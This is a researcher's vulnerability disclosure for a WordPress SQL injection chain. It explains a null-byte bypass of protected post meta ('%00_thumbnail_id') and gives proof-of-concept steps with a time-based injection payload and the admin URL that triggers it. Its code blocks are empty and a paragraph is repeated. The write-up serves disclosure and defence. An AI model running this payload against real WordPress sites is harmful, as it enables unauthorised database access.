Author: @Ambulong
I found this vulnerability after reading slavco’s post, and reported it to Wordpress Team via Hackerone on Sep. 2nd, 2017. But, unfortunately, WordPress team didn’t pay attention to this report too.
I found this vulnerability after reading slavco’s post, and reported it to Wordpress Team via Hackerone on Sep. 2nd, 2017. But, unfortunately, WordPress team didn’t pay attention to this report too.
# SQL Injection Details
- Wordpress SQLi by slavco
- Wordpress SQLi — PoC by slavco
- Wordpress SQLi — how to find by slavco
- Disclosure: WordPress WPDB SQL Injection - Technical by ircmaxell
# POC Details
If you already found out the potential sqli in wordpress, you would know that we need to insert our playload into _thumbnail_id
meta in order to launch the sqli attack.
## Wordpress ≤ 4.7.4 Lack of capability checks for post meta data in the XML-RPC API
This vulnerability have mentioned in slavco’s post: Wordpress SQLi
Reference: WordPress 4.7.5 Security and Maintenance Release
POC
|
|
## Wordpress ≤ 4.8.2 POST Meta Protection Bypass
A trick of Mysql
1). A normal query for _thumbnail_id
|
|
2). Change the meta_value of _thumbnail_id to “\x00_thumbnail_id”
|
|
3). Query by _thumbnail_id again
|
|
POST Meta Protection Bypass
This is the is_protected_meta
(./wp-includes/meta.php) method used to check the validation of post meta:
|
|
The code just checks the first character of $meta_key
, from the mysql trick, we can use %00_
to bypass it.
POC
- Add New Custom Field, Name:
_thumbnail_id
Value:55 %1$%s or sleep(10)#
- Click
Add Custom Field
button. - Modify the HTTP request,
_thumbnail_id
=>%00_thumbnail_id
- Launch the attack. Visit
/wp-admin/edit.php?action=delete&_wpnonce=xxx&ids=55 %1$%s or sleep(10)#
.
Time-line:
- Sep. 2th - I report the vulnerability to WP Team via Hackerone.
- Sep. 6th - WP Team ask for details.
- Sep. 6th - I post the details.
- Sep. 6th to now - I haven’t received any response yet…